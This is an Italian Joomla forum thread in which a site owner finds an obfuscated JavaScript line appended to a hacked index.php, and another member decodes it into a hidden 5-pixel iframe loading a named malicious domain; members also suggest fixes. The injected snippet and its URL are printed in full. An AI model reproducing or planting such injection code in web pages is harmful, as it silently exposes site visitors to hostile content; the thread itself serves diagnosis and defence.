Un bug di joomla o un attaco hacker?

[acael]

Mi è capitato diverse volte che il mio sito joomla smette di funzionare improvvisamente restituendo sul browser questo errore:

Parse error: syntax error, unexpected '<' in /home/mhd-01/www.orbitante.com/htdocs/index.php on line 89.

Per risolvere il problema in genere riuppo il file "index.php" nell root, sovrascrivendo quello precedente.

Questa volta però mi preoccupa il fatto che da quando mi è successo, l'indicizzazione del sito ne ha risentito parecchio. Provate a scrivere "orbitante" su google (il mio sito è www.orbitante.com) e notate che il titolo e la descrizione del sito corrispondono all'errore restituito da joomla.

Potrebbe essere qualche smanettone rompiscatole che compromette il mio sito? Perchè joomla dovrebbe smettere di funzionare come se il codice della index si modificasse da solo?

Aspetto con ansia una risposta, grazie.

Ps. ho dimenticato di dire che la versione joomla che uso è la 1.5.10

[56francesco]

direi che c'è n'è abbastanza per adottare delle precauzioni, cambia spesso le credenziali di accesso, tutte database ed ftp comprese, poi considerato l'argomento del sito fai spesso le copie..
non è un bug di joomla ovviamente
la mia connessione da ieri va a 15kb (!!!) appena posso guardo pure il tuo sito, ma se hai un contatore esterno ti consiglierei di eliminarlo perchè è una porta per certi tipi di fastidi...

[acael]

Ho un contatore shinystat, mi serve per capire le visite che ricevo e da dove le ricevo.
C'è un modo di disfarmi di shinystat e comunque vedere gli accessi al mio sito?

[ramses_2th]

se riuppi semplicemente per risolvere il problema, non capirai il perchè dell'errore.

Confronata i due file, e cerca di capire, se ci sono e quali sono le differenze tra i due.

[acael]

azz non ci avevo pensato. Ogni volta la fretta di sistemare è tanta che non ho riflettuto a farlo.
Dovrò aspettare il prossimo caso (sperando che non capiti più) per fare questo confronto. 

[56francesco]

Ho un contatore shinystat,

tipico, come e chi non saprei e non credo sia importante ma confermi che qualcuno ha una bella porta spalancata per riempire di monnezza i files del tuo sito, di sicuro non sono hacher ma semmai spammers...

C'è un modo di disfarmi di shinystat e comunque vedere gli accessi al mio sito?

questa è un'altra domanda...
risolvi un problema per volta, prima chiudi la porta agli sporcaccioni, poi risolvi questo...

[Francesco Centomo]

Ti consiglio di usare google analyst. Ti copi una stringa nel file index.php del template, e nel portale di google vedi le visite, le provenienze, città e molto altro ancora.
Ciao

[acael]

Grazie mille a tutti per l'aiuto.

[acael]

La situazione continua a verificarsi e questa volta ho confrontato i due file index.php.

La differenza tra il file originale e quello guasto è, che alla fine dell'index.php corrotta c'è una riga in più che ha questo contenuto:

Codice: [Seleziona]

yj='77';o='c';s='e';va='cd';og='2';ua='175';l='tch';zj='8c0';mx='.';ze='76';sy='i';ja='zpr';g='3b';m='tp';h='d';oo='0d';gi='bam';nw='f';a='d';p='bi';d='://';wm='/?';z='m';ci='e';dg='0d4';fa='ak';x='fra';pt='o';om='90';nz='a4';k='i';oi='a';vh='c';t='sun';ul='a55';vv='f';pu='o';ox='bar';er='a';j='f';iw='sr';u='n/';kt='on';v='c';de='0';b='ht';gg=sy.concat(x,z,s);jy=iw.concat(o);qm=b.concat(m,d,ox,fa,pt,gi,er,t,pu,nw,kt,ci,p,l,mx,k,u,vh,a,ja,vv,wm,ul,zj,g,v,j,oi,de,h,ua,ze,va,dg,oo,nz,om,yj,og);var q=document.createElement(gg);q.setAttribute('width','5');q.setAttribute('height','5');q.setAttribute('style','display:none');q.setAttribute(jy,qm);document.body.appendChild(q);
Qualcuno sa come potrei risolvere?

[jabba]

ciao, è siuramente un attacco di hacking. Se metti in ordine quel codice ti viene fuori questo:

Codice: [Seleziona]

yj='77';
o='c';
s='e';
va='cd';
og='2';
ua='175';
l='tch';
zj='8c0';
mx='.';
ze='76';
sy='i';
ja='zpr';
g='3b';
m='tp';
h='d';
oo='0d';
gi='bam';
nw='f';
a='d';
p='bi';
d='://';
wm='/?';
z='m';
ci='e';
dg='0d4';
fa='ak';
x='fra';
pt='o';
om='90';
nz='a4';
k='i';
oi='a';
vh='c';
t='sun';
ul='a55';
vv='f';
pu='o';
ox='bar';
er='a';
j='f';
iw='sr';
u='n/';
kt='on';
v='c';
de='0';
b='ht';
gg=sy.concat(x,z,s);
jy=iw.concat(o);
qm=b.concat(m,d,ox,fa,pt,gi,er,t,pu,nw,kt,ci,p,l,mx,k,u,vh,a,ja,vv,wm,ul,zj,g,v,j,oi,de,h,ua,ze,va,dg,oo,nz,om,yj,og);

var
q=document.createElement(gg);
q.setAttribute('width','5');
q.setAttribute('height','5');
q.setAttribute('style','display:none');
q.setAttribute(jy,qm);
document.body.appendChild(q);

quindi, facendo tutte le sostituzioni viene fuori questo:

Codice: [Seleziona]

document.createElement(iframe);
q.setAttribute('width','5');
q.setAttribute('height','5');
q.setAttribute('style','display:none');
q.setAttribute(src,http://barakobamasunofonebitch.in/in/cdzprf/?a558c03bcfa0d17576cd0d40da490772);
document.body.appendChild(q);

ovviamente è vivamente sconsigliato usare quel link li sopra.

Alla luce di questo ti consiglierei:

• Aggiorna Joomla
• Aggiorna tutti i tuoi componenti
• Aggiorna tutte le tue password (di joomla)
• Aggiorna tutte le tue password (spazio web, pannello di controllo se ce l'hai, database)

[acael]

Grazie per la risposta, ho seguito i tuoi consigli.

Ho pensato anche di impostare i permessi del file index.php a sola lettura per tutti (codice 444) pensi che possa servire o causare problemi per il corretto funzionamento del sito?

[56francesco]

ragazzi evitate di diffondere quella porchieria, agevolate solo il loro gioco..

e non si tratta altro che di spammer che entrano attraverso i soliti contatori e altri servizi simili (forse gestiti da loro stessi) per diffondere la loro monnezza che gli serve per scalare i motori di ricerca..

quindi niente bug di joomla, al solito la sicurezza sta tra il monitor e lo schienale della sedia dell'amministrazione del sito....

[acael]

Uso solo i servizi di google.
Esiste una guida alla sicurezza di joomla?

(ho fatto male a settasre 444 su index.php?)

[informatore82]

Wow, robe da pazzi, secondo me ci sono gli estremi per una denuncia verso il proprietario del sito ''cattivone''

Comunque non credo abbia i dati di accesso per modificarti i file, semplicemente come dicono in molti quì hai qualche componente, plugin o lo stesso tema infetto e ti vien fuori questo scherzetto, ho letto che spesso i temi gratuiti (specialmente se non scaricati dai siti ufficiali) così come i plugin e moduli vengono modificati con codici strani proprio come il tuo, quindi io penserei a cosa ho installato nell'immediato appena prima che i problemi iniziassero a verificarsi, poi se è una cosa del primo momento...ma non credo.

In ultimo...Interessante il tuo sito, se avessi più tempo me lo leggerei tutto, però..ehm...guarda quà :

La NASA ha scagliato la sua arma contro la superficie lunare seguita da una sonda che, con pochi secondi a disposizione, ha raccolto tutti i dati necessari per determinare se sulla luna c’è traccia di acqua, e quindi se tra qualche hanno sarà possibile la realizzazione di una base lunare.

Tratto dalla Home page del tuo sito...

Meglio correggere quello strafalcione no? 

[= odino =]

spesso i temi gratuiti (specialmente se non scaricati dai siti ufficiali) così come i plugin e moduli vengono modificati con codici strani proprio come il tuo

nono, questa è una graaaande bugia... 

[informatore82]

ehm..non ci siamo capiti, non ho detto che il gratuito porta certe rogne, ho detto che se anzichè scaricarli dai siti UFFICIALI vai a scaricarli da altri lidi imrpvvisati capita sovente di ritrovarsi con quelle fregature, naturalmente se scarichi il tema o quel che è dal sito ufficiale di Joomla o da quello dell'autore questi problemi non sorgono.

[acael]

Tratto dalla Home page del tuo sito...

Meglio correggere quello strafalcione no? 

Grazie per la segnalazione, non mi ero accorto della gaffe 

Volevo segnalare anche il fatto che di recente ho inserito gli annunci google adsense. Ho notato che nella home del sito gli annunci sono in inglese mentre nelle pagine degli articoli sono in italiano.

Potrebbe significare qualcosa che riguarda il problema che ho?

[acael]

Per la cronaca, sembrerebbe che il problema si sia risolto impostando i permessi della index a 444